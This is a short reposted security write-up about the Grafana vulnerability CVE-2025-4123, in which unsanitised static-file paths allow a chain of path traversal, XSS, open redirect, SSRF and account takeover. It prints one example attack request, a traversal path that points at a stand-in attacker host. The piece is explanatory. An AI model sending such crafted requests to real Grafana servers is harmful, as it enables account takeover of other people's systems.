Grafana的一个高危漏洞(CVE-2025–4123)因未正确清理用户提供的路径,导致路径遍历、XSS、SSRF和账户接管等连锁攻击,最终实现完全账户控制。 2025-7-19 13:14:24 Author: infosecwriteups.com(查看原文) 阅读量:20 收藏
What started as a path traversal led to XSS, SSRF, and full account compromise.
In cybersecurity, a single flaw is rarely just a flaw — it’s a gateway. CVE-2025–4123, a high-severity vulnerability in Grafana, proved this by chaining path traversal, XSS, open redirects, SSRF, and account takeover into one devastating exploit.
Here’s how a seemingly minor misconfiguration became a nightmare for DevOps teams worldwide.
Grafana’s staticHandler function, designed to serve static files, had a critical oversight: it didn’t properly sanitize user-supplied paths. Attackers could manipulate URLs to traverse directories, accessing files they shouldn’t:
GET /public/\attacker.com/%3F/../../../.. HTTP/1.1
Host: vulnerable-grafana.com This wasn’t just about reading files — it was the first step in a much larger attack chain.
you can check this article too…
如有侵权请联系:admin#unsafe.sh